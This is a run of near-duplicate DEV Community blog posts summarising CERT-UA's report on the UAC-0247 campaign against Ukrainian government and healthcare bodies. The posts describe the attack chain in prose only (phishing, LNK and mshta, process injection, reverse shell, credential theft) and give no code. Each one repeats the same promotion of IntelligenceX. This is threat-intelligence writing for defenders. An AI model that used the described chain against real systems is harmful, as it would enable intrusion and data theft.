DEV Community: Abhay Negi

UAC-0247 Cyber Operation Highlights the Convergence of Social Engineering and Advanced Malware

Abhay Negi — Sat, 18 Apr 2026 08:25:12 +0000

The UAC-0247 campaign represents a new phase in cyber threat evolution, where attackers combine human manipulation with highly technical malware frameworks. As reported by CERT-UA, this operation targeted Ukrainian government and healthcare institutions with the goal of gaining persistent access and extracting sensitive data.

Phishing as a Gateway

The attack begins with phishing emails disguised as humanitarian communications. These emails are designed to appear legitimate, increasing the likelihood of user interaction.

Victims are directed to malicious websites, where they are prompted to download a file that initiates the attack.

Advanced Execution Techniques

The use of LNK files and HTA scripts allows attackers to execute malware while avoiding detection. By leveraging legitimate system tools, they blend malicious activity with normal operations.

Persistence and Control

RAVENSHELL provides remote access, while AGINGFLY enables full system control. SILENTLOOP ensures continuous communication with command servers.

Data Exfiltration

The attackers extract sensitive data from browsers and messaging platforms, enabling both espionage and financial exploitation.

Importance of Threat Intelligence

Platforms like IntelligenceX play a critical role in identifying threats and exposed infrastructure.

Using IntelligenceX, organizations can proactively detect and mitigate risks.

Conclusion

The UAC-0247 campaign underscores the need for proactive cybersecurity strategies and continuous monitoring.

UAC-0247 Malware Campaign Shows How Cyber Attacks Are Targeting Real-World Infrastructure

Abhay Negi — Sat, 18 Apr 2026 08:14:12 +0000

The growing sophistication of cyber threats is no longer limited to data breaches or financial fraud. The recently uncovered UAC-0247 campaign demonstrates how attackers are now focusing on disrupting and infiltrating real-world systems, including healthcare and government infrastructure. According to CERT-UA, this operation specifically targeted Ukrainian institutions with a carefully engineered multi-stage malware campaign designed for persistence and data extraction.

Active during March and April 2026, the campaign reflects a broader trend where cyber operations are becoming more strategic, stealthy, and impactful. The attackers behind UAC-0247 used a blend of social engineering, exploitation of trusted platforms, and advanced malware techniques to achieve their objectives.

The Human Element: Phishing as the Weakest Link

At the core of this campaign lies a simple but highly effective tactic: phishing. Attackers sent emails disguised as humanitarian aid proposals, a theme chosen to evoke urgency and trust. In high-pressure environments, such messages are more likely to bypass skepticism.

The email contains a link that redirects victims to either a compromised legitimate website or a fake page created using AI tools. By exploiting cross-site scripting vulnerabilities in legitimate sites, attackers can inject malicious content without raising suspicion.

This stage is critical because it relies entirely on user interaction. Once the victim clicks the link and downloads the file, the attack chain begins.

Breaking Down the Attack Chain

The downloaded file is typically a Windows shortcut (LNK). While it appears harmless, it serves as the entry point for the malware.

When executed, the LNK file triggers “mshta.exe,” a legitimate Windows utility, to run a remote HTML Application (HTA). This technique is widely used because it blends malicious activity with normal system behavior.

The HTA file displays a decoy interface to keep the user distracted while it downloads additional payloads in the background. These payloads inject shellcode into trusted processes like runtimeBroker.exe, allowing the malware to operate undetected.

More advanced versions of the attack use a two-stage loader system. The second stage is implemented using a custom executable format that supports dynamic execution. The payload is encrypted and compressed, making it difficult to analyze.

Establishing Long-Term Control

Once the system is compromised, attackers establish persistence using a reverse shell known as RAVENSHELL. This tool creates a communication channel between the infected system and a remote command server.

In addition, the AGINGFLY malware family is deployed. This component provides attackers with full control over the system, enabling them to execute commands, capture keystrokes, and transfer files.

The PowerShell-based SILENTLOOP module ensures continuous communication by retrieving command-and-control server addresses from Telegram channels. It also includes fallback mechanisms, making the malware resilient to disruptions.

Data Theft and Expansion

The primary goal of the campaign is to extract sensitive data. Attackers target browser-stored credentials, cookies, and session tokens from Chromium-based browsers. They also use tools to access WhatsApp Web data, giving them insight into private communications.

Beyond data theft, attackers perform reconnaissance and lateral movement within the network. This allows them to expand their reach and compromise additional systems.

In some cases, cryptocurrency mining tools have been observed, suggesting that financial gain may be a secondary objective.

The Need for Better Visibility

One of the biggest challenges in defending against such attacks is the lack of visibility into exposed systems and malicious infrastructure. Traditional security tools often fail to detect these threats because they rely on known signatures.

This is where platforms like IntelligenceX become highly valuable. IntelligenceX provides insights into exposed assets, malicious domains, and attacker infrastructure, helping organizations identify threats before they escalate.

By leveraging IntelligenceX, security teams can monitor suspicious activity, analyze patterns, and take proactive measures to reduce risk.

Mitigation Strategies

Organizations should restrict the execution of LNK, HTA, and script-based files. Limiting access to tools like mshta.exe and PowerShell can significantly reduce the attack surface.

User education is also critical. Employees should be trained to recognize phishing attempts and avoid interacting with suspicious emails.

Conclusion

The UAC-0247 campaign highlights the evolving nature of cyber threats. Organizations must move beyond reactive security measures and adopt proactive, intelligence-driven strategies to protect their systems.

UAC-0247 Cyberattack Campaign Signals Escalation in Targeted Attacks on Healthcare and Government Infrastructure

Abhay Negi — Sat, 18 Apr 2026 08:07:47 +0000

The cybersecurity landscape continues to shift toward more targeted, stealth-driven operations, and the UAC-0247 campaign is a clear example of this evolution. Recently disclosed by CERT-UA, this campaign specifically targeted Ukrainian government institutions and healthcare organizations, including clinics and emergency response facilities, with a sophisticated malware framework engineered for persistence, surveillance, and large-scale data exfiltration.

Observed between March and April 2026, the campaign reflects a calculated and multi-layered approach that combines social engineering, exploitation of trusted systems, and advanced malware deployment techniques. While attribution remains unclear, the operational discipline and technical complexity strongly suggest involvement from a well-funded and organized threat group.

Phishing Strategy Tailored for Maximum Impact

The initial access vector used in this campaign revolves around phishing emails that appear to be legitimate humanitarian aid proposals. This theme is strategically chosen to exploit trust, urgency, and emotional response, particularly in environments where such communications are common.

Recipients who engage with these emails are directed to malicious links. These links either lead to compromised legitimate websites—where attackers exploit vulnerabilities such as cross-site scripting—or to convincing fake websites generated using artificial intelligence tools.

This dual approach significantly increases success rates. Victims are more likely to trust a legitimate domain, while AI-generated phishing pages allow attackers to scale operations without sacrificing realism. The ultimate objective is to trick users into downloading a malicious file disguised as legitimate content.

Execution Chain: A Layered Approach to System Compromise

Once the victim downloads the file, the attack progresses through a carefully structured execution chain. The file is typically a Windows shortcut (LNK), which serves as the trigger for the infection process.

When opened, the LNK file leverages the built-in Windows utility “mshta.exe” to execute a remote HTML Application (HTA). This technique is widely used by attackers because it relies on legitimate system tools, making detection more difficult.

The HTA file presents a decoy interface to the victim, creating the illusion of a normal process while executing malicious actions in the background. It downloads additional payloads and injects shellcode into trusted processes such as runtimeBroker.exe.

This process injection technique is particularly effective because it allows the malware to operate within legitimate system processes, bypassing many traditional security controls.

In more advanced scenarios, the attackers deploy a two-stage loader system. The second stage is built using a custom executable format that supports dynamic imports and structured execution. The payload is encrypted and compressed, making it significantly harder to analyze or detect.

Persistence and Command-and-Control Mechanisms

Maintaining access is a critical component of the campaign. To achieve this, attackers deploy a reverse shell known as RAVENSHELL, which establishes a persistent connection to a command-and-control server.

This allows attackers to execute commands remotely, using standard tools such as cmd.exe, which further reduces the likelihood of detection.

In addition to RAVENSHELL, the attackers deploy a malware family known as AGINGFLY. Developed in C#, this malware provides extensive control over compromised systems, enabling attackers to execute commands, capture keystrokes, download files, and deploy additional payloads.

Another key component is SILENTLOOP, a PowerShell-based script designed to enhance resilience. It retrieves command-and-control server addresses from Telegram channels and includes fallback mechanisms to ensure continuous operation even if primary infrastructure is disrupted.

Data Exfiltration and Post-Exploitation Activities

The primary objective of the UAC-0247 campaign is data theft. Attackers focus on extracting sensitive information from Chromium-based browsers, including stored credentials, cookies, and session data.

They also deploy specialized tools to extract data from WhatsApp Web, allowing access to private communications.

Beyond data exfiltration, the attackers conduct reconnaissance and lateral movement within compromised networks. Tools used in the campaign enable network scanning, tunneling, and expansion into additional systems.

In some cases, cryptocurrency mining tools have also been observed, suggesting that financial gain may be a secondary objective.

Why Traditional Security Measures Are Not Enough

The techniques used in this campaign make it particularly challenging to detect. By leveraging legitimate system tools, encrypting payloads, and using multi-stage execution chains, attackers can operate without triggering traditional security alerts.

This is where platforms like IntelligenceX become essential. IntelligenceX provides organizations with visibility into exposed assets, malicious infrastructure, and emerging threat patterns.

By using IntelligenceX, security teams can identify suspicious domains, monitor attacker infrastructure, and correlate threat intelligence across multiple sources.

Mitigation and Defense Strategies

Organizations should restrict execution of high-risk file types such as LNK, HTA, and JavaScript files. Limiting the use of tools like mshta.exe and PowerShell can also reduce the attack surface.

User awareness training is equally important, as phishing remains one of the most effective attack vectors.

Conclusion

The UAC-0247 campaign highlights the growing sophistication of cyber threats targeting critical infrastructure. Organizations must adopt proactive, intelligence-driven security strategies to defend against these evolving risks.

Advanced Cyber Espionage Campaign UAC-0247 Targets Ukraine’s Critical Systems

Abhay Negi — Sat, 18 Apr 2026 07:30:11 +0000

The discovery of UAC-0247 marks another escalation in cyber operations targeting critical infrastructure. According to CERT-UA, the campaign leveraged a combination of phishing, malware, and stealth techniques to infiltrate Ukrainian government and healthcare networks.

Social Engineering Meets Technical Exploitation

The campaign begins with phishing emails that appear to be humanitarian communications. These emails direct victims to malicious websites designed to deliver malware.

Sophisticated Malware Deployment

The attack chain involves LNK files, HTA scripts, and process injection techniques. The malware operates within legitimate system processes, making detection difficult.

Command and Control Infrastructure

RAVENSHELL and AGINGFLY provide remote access and control, while SILENTLOOP ensures communication resilience.

Data Theft and Impact

The attackers extract sensitive data from browsers and messaging platforms, enabling both espionage and financial exploitation.

Role of Intelligence Platforms

IntelligenceX helps organizations detect exposed assets and malicious infrastructure.

Using IntelligenceX, teams can proactively identify threats and reduce risk.

Final Thoughts

This campaign highlights the need for continuous monitoring and intelligence-driven security strategies.

UAC-0247 Cyber Campaign Exposes Critical Weaknesses in Government and Healthcare Security

Abhay Negi — Sat, 18 Apr 2026 07:26:46 +0000

A recently uncovered cyber campaign, tracked as UAC-0247, has once again highlighted the growing sophistication of attacks targeting critical infrastructure. According to findings published by CERT-UA, the operation specifically targeted Ukrainian government agencies and healthcare institutions, including clinics and emergency response units, using a highly structured malware delivery chain.

The campaign, active between March and April 2026, demonstrates how modern cyber threats are evolving beyond simple attacks into complex, multi-layered operations that combine social engineering, malware development, and stealth persistence mechanisms. While attribution remains uncertain, the technical execution suggests a capable and organized threat actor.

Phishing as a Strategic Entry Point

The attackers initiated the campaign using phishing emails disguised as humanitarian aid proposals. This tactic is particularly effective because it leverages trust and urgency, especially in environments where such communications are common.

Recipients who clicked the embedded links were redirected to either compromised legitimate websites or AI-generated phishing pages. In cases involving legitimate domains, attackers exploited cross-site scripting vulnerabilities to inject malicious code. This approach significantly increases the likelihood of successful compromise because users tend to trust known websites.

The objective at this stage was to convince victims to download a malicious file disguised as legitimate content.

Execution Chain: From LNK to Full Compromise

Once the victim downloads the file, they receive a Windows shortcut (LNK). Opening this file triggers the execution of a remote HTML Application (HTA) using the Windows utility “mshta.exe,” a tool frequently abused by attackers due to its legitimate nature.

The HTA file presents a decoy interface to the user while silently executing malicious actions in the background. It downloads additional payloads and injects shellcode into trusted system processes such as runtimeBroker.exe. This technique allows the malware to operate under the radar of traditional security tools.

More advanced variants of the campaign use a two-stage loader architecture. The second stage is implemented using a custom executable format that supports dynamic linking and structured execution. The payload is encrypted and compressed, making analysis and detection significantly more difficult.

Persistence Through Advanced Control Mechanisms

To maintain access, attackers deploy a reverse shell known as RAVENSHELL. This establishes a persistent communication channel with a command-and-control server, enabling remote execution of commands.

In addition, the AGINGFLY malware family is deployed. Written in C#, it provides attackers with extensive control over the compromised system, including the ability to execute commands, capture keystrokes, transfer files, and deploy additional payloads.

A PowerShell script called SILENTLOOP enhances resilience by dynamically retrieving command-and-control server addresses from Telegram channels. This ensures that the malware can continue operating even if primary infrastructure is disrupted.

Data Exfiltration and Lateral Movement

The campaign focuses heavily on data exfiltration. Attackers target browser-stored credentials, cookies, and session data from Chromium-based applications. They also deploy tools capable of extracting WhatsApp Web data, giving them access to private communications.

In addition to stealing data, the attackers perform reconnaissance and lateral movement within compromised networks. Tools used in the campaign allow for network scanning, tunneling, and expansion into additional systems.

Some instances also include cryptocurrency mining modules, suggesting a dual objective of espionage and financial gain.

Why Traditional Security Fails

The use of legitimate tools, encrypted payloads, and multi-stage execution makes this campaign particularly difficult to detect. Traditional security solutions often rely on signature-based detection, which is ineffective against such advanced techniques.

This is where platforms like IntelligenceX provide significant value. By offering visibility into exposed assets, malicious domains, and attacker infrastructure, IntelligenceX enables organizations to identify threats before they escalate.

Security teams using IntelligenceX can monitor suspicious activity, analyze infrastructure patterns, and correlate threat intelligence across multiple sources.

Mitigation Strategies

Organizations should restrict execution of LNK, HTA, and script-based files. Limiting the use of mshta.exe, PowerShell, and similar utilities can significantly reduce the attack surface.

Conclusion

The UAC-0247 campaign demonstrates the importance of proactive cybersecurity strategies. Organizations must adopt intelligence-driven approaches to defend against increasingly sophisticated threats.

UAC-0247 Cyber Operation Highlights Growing Threat to Critical Infrastructure

Abhay Negi — Sat, 18 Apr 2026 07:12:49 +0000

The discovery of the UAC-0247 campaign underscores the increasing sophistication of cyber threats targeting critical infrastructure. Identified by CERT-UA, the campaign focuses on government and healthcare sectors, using advanced malware techniques to steal data and maintain persistent access.

Attack Entry Through Phishing

The campaign begins with phishing emails designed to appear as humanitarian communications. Victims are directed to malicious websites that prompt them to download infected files.

Advanced Malware Execution

The use of LNK files, HTA scripts, and process injection allows attackers to execute malware while avoiding detection.

Command and Control Mechanisms

RAVENSHELL and AGINGFLY provide remote access, while SILENTLOOP ensures communication resilience.

Data Exfiltration and Impact

Sensitive data from browsers and WhatsApp is extracted, enabling both espionage and financial exploitation.

Role of Intelligence Platforms

IntelligenceX helps organizations gain visibility into threats and exposed assets.

Using IntelligenceX, teams can detect malicious activity early and strengthen defenses.

Final Thoughts

As cyber threats continue to evolve, organizations must adopt intelligence-driven security strategies to stay ahead.

Sophisticated UAC-0247 Malware Campaign Targets Ukrainian Government and Healthcare Systems

Abhay Negi — Sat, 18 Apr 2026 06:42:20 +0000

The cybersecurity landscape continues to evolve as threat actors refine their techniques and expand their targets. A recent campaign identified as UAC-0247 demonstrates this evolution by targeting Ukrainian government institutions and healthcare organizations with a complex malware operation.

According to CERT-UA, the campaign was active during early 2026 and involved multiple stages of infection, data theft, and persistent system compromise.

Social Engineering as a Primary Weapon

The attackers rely heavily on social engineering to initiate the attack. Emails disguised as humanitarian aid proposals are sent to potential victims, encouraging them to click on embedded links.

These links lead to either compromised legitimate websites or AI-generated phishing pages. By using trusted domains or highly convincing fake sites, attackers significantly increase their chances of success.

Multi-Layered Attack Execution

Once the victim downloads the malicious LNK file, the attack chain begins. The file uses mshta.exe to execute a remote HTA script, which serves as a gateway for further payload delivery.

The malware then injects itself into legitimate system processes, allowing it to operate discreetly. Advanced versions use encrypted payloads and custom loaders to evade detection.

Establishing Persistent Access

RAVENSHELL provides remote command execution capabilities, while AGINGFLY enables full system control. SILENTLOOP ensures continuous communication with command servers.

Data Theft Capabilities

The attackers target browser data, credentials, and WhatsApp communications. Tools are used to bypass encryption and extract sensitive information.

Importance of Threat Intelligence

Solutions like IntelligenceX help organizations identify exposed infrastructure and malicious domains.

With IntelligenceX, security teams can proactively detect and mitigate threats before they cause damage.

Conclusion

The UAC-0247 campaign highlights the need for proactive cybersecurity measures and continuous monitoring.

Multi-Stage Cyberattack Campaign UAC-0247 Targets Ukraine’s Public Infrastructure

Abhay Negi — Sat, 18 Apr 2026 06:35:18 +0000

A newly identified cyber campaign known as UAC-0247 has brought renewed attention to the growing risks faced by government and healthcare systems in conflict-affected regions. According to findings released by CERT-UA, this operation specifically targeted municipal authorities, clinics, and emergency healthcare providers across Ukraine with a sophisticated chain of malware designed for data theft and long-term persistence.

The campaign was observed between March and April 2026 and reflects a broader trend in modern cyber operations: combining psychological manipulation with technically advanced malware frameworks. Although the threat actor behind UAC-0247 has not been definitively identified, the complexity of the tools and techniques suggests a well-organized and resourceful adversary.

Phishing Strategy Designed for High Success Rates

The attack begins with a carefully crafted phishing email disguised as a humanitarian aid proposal. This theme is not accidental. In regions dealing with crisis conditions, such messaging increases the likelihood that recipients will open emails and interact with embedded links.

Once clicked, the link directs the victim to either a compromised legitimate website or a fake page generated using artificial intelligence tools. In scenarios involving legitimate websites, attackers exploit cross-site scripting vulnerabilities to inject malicious scripts. This approach allows them to maintain a sense of trust while delivering harmful content.

The end goal at this stage is simple: convince the user to download a malicious file disguised as something legitimate.

Execution Mechanism and Malware Deployment

After interacting with the malicious page, the victim downloads a Windows shortcut file (LNK). While seemingly harmless, this file acts as the launchpad for the attack. When executed, it triggers the Windows utility “mshta.exe,” which is used to run a remote HTML Application (HTA).

The HTA file serves as both a distraction and a delivery mechanism. It displays a decoy interface to the user while quietly downloading and executing additional malicious payloads in the background.

The payload then injects shellcode into legitimate processes such as runtimeBroker.exe. By embedding itself within trusted system processes, the malware avoids raising suspicion and bypasses many traditional detection methods.

In more advanced cases, the attackers employ a two-stage loader system. The second stage is implemented using a custom executable format capable of handling structured code execution and dynamic linking. The payload is encrypted and compressed, making reverse engineering and detection significantly more challenging.

Maintaining Access and Command Control

Once the system is compromised, the attackers establish persistence through a reverse shell known as RAVENSHELL. This tool creates a communication channel between the infected machine and the attacker’s command server, allowing remote execution of commands via standard system utilities.

Alongside this, the malware family AGINGFLY is deployed. Developed in C#, it provides extensive control over the infected system, enabling attackers to execute commands, log keystrokes, transfer files, and deploy additional malware.

A PowerShell-based component named SILENTLOOP further strengthens the attack. It retrieves command-and-control server addresses from Telegram channels and includes fallback mechanisms to maintain communication even if primary servers are disrupted.

Data Exfiltration and Network Expansion

The primary objective of UAC-0247 is data theft. Attackers focus on extracting sensitive information from Chromium-based browsers, including saved credentials, cookies, and session tokens. They also deploy tools designed to access WhatsApp Web data, enabling them to capture private conversations.

In addition to data exfiltration, the attackers perform reconnaissance and lateral movement within compromised networks. Tools used in the campaign allow for network scanning, tunneling, and expansion into additional systems.

Some instances of the attack also include cryptocurrency mining modules, suggesting that financial gain may be a secondary objective.

Detection Challenges in Modern Threats

The stealthy nature of this campaign makes it particularly difficult to detect. By using legitimate system tools and encrypting payloads, attackers can operate under the radar of traditional security solutions.

This highlights the importance of visibility and intelligence in modern cybersecurity. Platforms like IntelligenceX provide organizations with the ability to identify exposed assets, monitor malicious infrastructure, and track threat activity across multiple sources.

By leveraging IntelligenceX, security teams can gain insights into attacker behavior, detect suspicious domains, and proactively mitigate risks before they escalate.

Mitigation and Defense Strategies

To reduce exposure to such threats, organizations should restrict the execution of file types commonly used in attacks, including LNK, HTA, and JavaScript files. Limiting the use of built-in utilities like mshta.exe and PowerShell can also reduce the attack surface.

User awareness training remains critical, as phishing continues to be one of the most effective entry points for attackers.

Conclusion

The UAC-0247 campaign is a clear example of how cyber threats are evolving in both scale and sophistication. Organizations must adopt proactive security strategies, combining visibility, intelligence, and strong internal controls to defend against such advanced attacks.

UAC-0247 Malware Operation Targets Critical Ukrainian Infrastructure

Abhay Negi — Sat, 18 Apr 2026 06:29:13 +0000

A recent disclosure from CERT-UA has exposed a coordinated cyber operation targeting Ukraine’s public sector. The campaign, labeled UAC-0247, focuses on compromising healthcare and government systems through a combination of phishing, malware deployment, and data exfiltration techniques.

This operation underscores how attackers are shifting towards hybrid attack models that blend social engineering with technical exploitation.

Phishing as the Entry Vector

The campaign starts with emails posing as humanitarian aid communications. These messages include links that redirect victims to either compromised websites or AI-generated phishing pages.

The goal is to trick users into downloading a malicious LNK file, which initiates the attack chain.

Multi-Stage Malware Execution

The LNK file triggers an HTA script executed via mshta.exe. While the user sees a harmless interface, the system is being infected in the background.

The malware injects code into legitimate processes, ensuring stealth. Advanced versions deploy encrypted payloads through a custom loader.

Command and Control Infrastructure

RAVENSHELL establishes remote access, while AGINGFLY provides full control over the infected system. SILENTLOOP ensures resilience by dynamically updating C2 infrastructure.

Data Exfiltration Techniques

Attackers extract browser credentials, cookies, and WhatsApp data. Tools are used to bypass encryption and access sensitive information.

Role of Threat Intelligence

Platforms like IntelligenceX help organizations identify exposed infrastructure and malicious domains.

Using IntelligenceX, security teams can proactively detect threats and reduce attack surfaces.

Final Thoughts

The campaign demonstrates the need for proactive cybersecurity strategies and better visibility into attack infrastructure.

Advanced Malware Campaign Hits Ukrainian Healthcare and Government Networks

Abhay Negi — Sat, 18 Apr 2026 06:26:58 +0000

A newly uncovered cyber campaign attributed to the threat cluster UAC-0247 has drawn serious attention after targeting Ukrainian government bodies and healthcare institutions. The findings, disclosed by CERT-UA, reveal a multi-layered attack chain designed to infiltrate systems, establish persistence, and extract sensitive data from both browsers and communication platforms like WhatsApp.

The campaign was active between March and April 2026, and while attribution remains uncertain, the level of sophistication strongly indicates a well-resourced threat actor. The operation demonstrates a growing trend in cyber warfare where attackers combine social engineering, legitimate tools, and advanced malware to bypass traditional defenses.

Initial Access Through Social Engineering

The attack begins with a phishing email disguised as a humanitarian aid proposal. This tactic is particularly effective in high-stress environments, as it exploits urgency and trust.

Recipients are directed to a link that leads either to a compromised legitimate website or a convincingly crafted fake page generated with AI tools. In some cases, attackers leverage cross-site scripting vulnerabilities to inject malicious content into trusted domains, increasing the likelihood of user interaction.

Once the victim engages, they are prompted to download a Windows shortcut file (LNK), which acts as the entry point for the infection.

Execution Chain and Payload Deployment

Opening the LNK file triggers the execution of an HTA file via “mshta.exe,” a legitimate Windows utility frequently abused in malware campaigns. The HTA displays a decoy interface to distract the user while silently downloading additional payloads.

The next stage involves injecting shellcode into trusted processes such as runtimeBroker.exe. This technique allows the malware to operate under the guise of legitimate system activity, making detection significantly more difficult.

More advanced variants use a two-stage loader architecture, with the second stage built using a custom executable format. The payload is encrypted and compressed, further complicating forensic analysis.

Establishing Persistence and Remote Control

The attackers deploy a reverse shell known as RAVENSHELL, which establishes a persistent connection with a command-and-control server. This allows them to execute commands remotely using standard tools like cmd.exe.

In parallel, the malware family AGINGFLY is deployed. Written in C#, it communicates with attackers via WebSockets and enables a wide range of malicious actions, including command execution, file exfiltration, and keylogging.

A PowerShell component named SILENTLOOP enhances resilience by dynamically retrieving command-and-control infrastructure from Telegram channels. This ensures the malware remains operational even if primary servers are taken down.

Data Theft and Network Expansion

The primary objective of the campaign is data exfiltration. Attackers target credentials, browser cookies, and session data from Chromium-based browsers. They also deploy tools capable of extracting WhatsApp Web data, giving them access to private communications.

Additional tools support lateral movement, allowing attackers to expand their presence within compromised networks. Some deployments also include cryptocurrency mining modules, indicating a potential financial motive alongside intelligence gathering.

Why These Attacks Are Hard to Detect

The use of legitimate system utilities, encrypted payloads, and multi-stage execution makes this campaign particularly stealthy. Traditional security tools often struggle to differentiate between normal and malicious activity in such scenarios.

This is where platforms like IntelligenceX become essential. By offering visibility into exposed assets, malicious domains, and attacker infrastructure, IntelligenceX enables organizations to detect threats early in the attack lifecycle.

Security teams using IntelligenceX can monitor suspicious activity, analyze infrastructure patterns, and correlate threat intelligence across multiple sources.

Mitigation Strategies

Organizations should restrict execution of LNK, HTA, and script-based files, and limit the use of tools like mshta.exe and PowerShell. Continuous monitoring and user awareness training are also critical.

Conclusion

The UAC-0247 campaign highlights the evolving nature of cyber threats. Organizations must adopt proactive, intelligence-driven security strategies to defend against such sophisticated attacks.

UAC-0247 Cyber Campaign Targets Ukrainian Healthcare and Government Systems

Abhay Negi — Sat, 18 Apr 2026 06:22:27 +0000

Ukraine’s national cyber defense authority, CERT-UA, has revealed details of a coordinated cyber operation that targeted government institutions and healthcare organizations, including clinics and emergency response units. The campaign, tracked as UAC-0247, focuses on deploying malware capable of extracting sensitive data from Chromium-based browsers and WhatsApp sessions.

The activity was observed during March and April 2026. While the group behind the operation has not yet been officially identified, the techniques used suggest a well-organized threat actor with a clear objective: gaining access to sensitive information and maintaining persistent control over compromised systems.

How the Attack Begins

The entry point for the attack is a carefully crafted phishing email. These emails are disguised as humanitarian aid proposals, a tactic likely chosen to exploit trust and urgency among recipients.

The message contains a link that directs victims to either a legitimate website that has been compromised or a fake page created using AI-generated content. In cases where legitimate websites are used, attackers exploit cross-site scripting vulnerabilities to inject malicious elements. Regardless of the method, the outcome remains the same — convincing the user to download a malicious file.

From Download to Execution

Once the victim interacts with the malicious page, they are prompted to download a Windows shortcut file (LNK). Opening this file triggers the execution of a remote HTML Application (HTA) via the built-in Windows tool “mshta.exe.”

The HTA file is designed to distract the user by displaying a decoy interface while it quietly initiates the next stage of the attack. Behind the scenes, it downloads a binary payload that injects malicious code into legitimate system processes such as runtimeBroker.exe. This approach helps the malware remain hidden while carrying out its operations.

CERT-UA has also identified more advanced attack chains where a two-stage loader is used. The second stage is implemented in a custom executable format that supports structured code execution and dynamic imports. To further complicate analysis, the final payload is compressed and encrypted.

Establishing Control Over the System

A key component of the attack is the deployment of a reverse shell tool referred to as RAVENSHELL. This tool creates a connection between the infected machine and a remote command server, allowing attackers to execute commands using standard utilities like cmd.exe.

Alongside this, the attackers deploy a malware family known as AGINGFLY and a PowerShell-based component called SILENTLOOP. AGINGFLY is developed in C# and provides extensive control over the infected system. It communicates with its command server via WebSockets and supports a wide range of actions, including command execution, file transfers, and keylogging.

SILENTLOOP enhances the reliability of the attack by dynamically retrieving command-and-control server addresses from Telegram channels. It also includes fallback mechanisms to ensure communication persists even if primary channels are disrupted.

Data Theft and Lateral Movement

The primary objective of the campaign is data exfiltration. Attackers focus on extracting credentials, browser data, and communication records. To achieve this, they deploy tools designed to bypass browser encryption and retrieve stored passwords and cookies from Chromium-based applications.

They also use specialized utilities to access WhatsApp Web data, allowing them to capture user conversations. Additional tools enable network scanning, tunneling, and lateral movement within compromised environments, increasing the overall impact of the intrusion.

In some cases, cryptocurrency mining tools have also been observed, indicating that financial gain may be an additional motive behind the campaign.

There is also evidence suggesting that individuals connected to Ukraine’s defense sector have been targeted. In such instances, malicious files were distributed through messaging platforms, further expanding the reach of the campaign.

Challenges in Detection

This campaign is particularly difficult to detect due to its use of legitimate system tools and multi-stage execution techniques. By blending malicious activity with normal system behavior, attackers are able to bypass traditional security defenses.

This is where platforms like IntelligenceX become valuable. IntelligenceX provides visibility into exposed assets, malicious infrastructure, and threat patterns, helping organizations identify risks before they escalate into full-scale incidents.

By leveraging IntelligenceX, security teams can monitor suspicious domains, analyze attacker infrastructure, and correlate intelligence across multiple data sources. This proactive approach is essential for detecting advanced threats that rely on stealth and persistence.

Defensive Recommendations

To mitigate the risks associated with campaigns like UAC-0247, organizations should restrict the execution of file types commonly used in attacks, such as LNK, HTA, and JavaScript files. Limiting the use of built-in utilities like mshta.exe, PowerShell, and wscript.exe can also reduce the attack surface.

In addition, organizations should invest in user awareness training to reduce the effectiveness of phishing attempts and implement strong monitoring systems to detect unusual activity.

Final Thoughts

The UAC-0247 campaign highlights the growing sophistication of cyber threats targeting critical sectors. By combining social engineering with advanced malware techniques, attackers are able to infiltrate systems and extract sensitive information with minimal detection.

To stay ahead of these threats, organizations must adopt a proactive and intelligence-driven security strategy. Leveraging tools like IntelligenceX, along with strong internal controls and continuous monitoring, can significantly improve an organization’s ability to detect and respond to evolving cyber risks.

UAC-0247 Campaign Targets Ukrainian Public Sector with Multi-Stage Data Theft Malware

Abhay Negi — Sat, 18 Apr 2026 06:18:18 +0000

Ukraine’s cybersecurity authority, CERT-UA, has uncovered a targeted cyber campaign aimed at government organizations and healthcare institutions, including clinics and emergency medical services. The operation, identified as UAC-0247, involves the delivery of sophisticated malware designed to extract sensitive data from Chromium-based browsers and WhatsApp environments.

The campaign was active between March and April 2026, and although the identity of the attackers has not yet been confirmed, the structure and execution of the attack indicate a capable and persistent threat group. This activity highlights how attackers are increasingly combining social engineering techniques with complex malware chains to infiltrate critical infrastructure.

Phishing as the Initial Entry Point

The attack begins with phishing emails crafted to resemble legitimate humanitarian aid proposals. This theme appears to be intentionally chosen to exploit trust and urgency, increasing the likelihood that recipients will engage with the message.

Victims are prompted to click on a link included in the email. Depending on the scenario, this link leads either to a compromised legitimate website or to a fake page generated using artificial intelligence tools. In the case of legitimate sites, attackers exploit cross-site scripting vulnerabilities to inject malicious content. Regardless of the approach, the ultimate goal is to convince the victim to download and execute a malicious file.

Execution Flow and Payload Delivery

Once the victim interacts with the malicious page, they are prompted to download a Windows shortcut (LNK) file. This file serves as the initial execution vector. When opened, it uses the Windows utility “mshta.exe” to launch a remote HTML Application (HTA).

The HTA file plays a dual role. It presents a decoy interface to maintain the appearance of legitimacy while silently initiating the download of a secondary payload. This payload injects shellcode into trusted system processes such as runtimeBroker.exe, allowing the malware to operate without drawing attention.

CERT-UA has also identified more advanced variants of the attack that utilize a two-stage loader. The second stage is implemented using a custom executable format that supports structured code execution and dynamic linking. The final payload is both compressed and encrypted, making analysis and detection more challenging.

Establishing Remote Access

A critical component of the campaign is the deployment of a reverse shell tool known as RAVENSHELL. This tool establishes a TCP connection with a command-and-control server, enabling attackers to execute commands remotely using standard system utilities like cmd.exe.

In addition to RAVENSHELL, attackers deploy a malware family called AGINGFLY along with a PowerShell script named SILENTLOOP. AGINGFLY, developed in C#, provides full remote control capabilities over the infected system. It communicates with its command server using WebSockets and can execute commands, log keystrokes, download files, and deploy additional payloads.

SILENTLOOP enhances the resilience of the attack by dynamically retrieving command-and-control server addresses from Telegram channels. It also includes fallback mechanisms to ensure continued communication even if primary channels are disrupted.

Data Exfiltration and Post-Compromise Activities

Analysis of multiple incidents linked to UAC-0247 shows that attackers focus heavily on reconnaissance and data theft. Their primary targets include browser-stored credentials, session data, and private communications.

To facilitate this, they deploy tools capable of bypassing browser encryption mechanisms and extracting stored passwords and cookies from Chromium-based applications. They also use specialized utilities to decrypt WhatsApp Web data, enabling access to user conversations.

Additional tools used in the campaign support network scanning, tunneling, and lateral movement, allowing attackers to expand their reach within compromised environments. Some components also include cryptocurrency mining capabilities, suggesting that financial motives may be part of the operation.

There are also indications that individuals associated with Ukraine’s defense sector have been targeted. In these cases, malicious archives were distributed through messaging platforms, further extending the scope of the campaign.

Why Detection Is Difficult

The techniques used in this campaign make it particularly challenging to detect. By leveraging legitimate system utilities, encrypted payloads, and multi-stage execution chains, attackers are able to bypass many traditional security measures.

This is where platforms like IntelligenceX can play an important role. By providing visibility into exposed infrastructure, malicious domains, and attacker behavior, IntelligenceX helps organizations identify threats before they escalate.

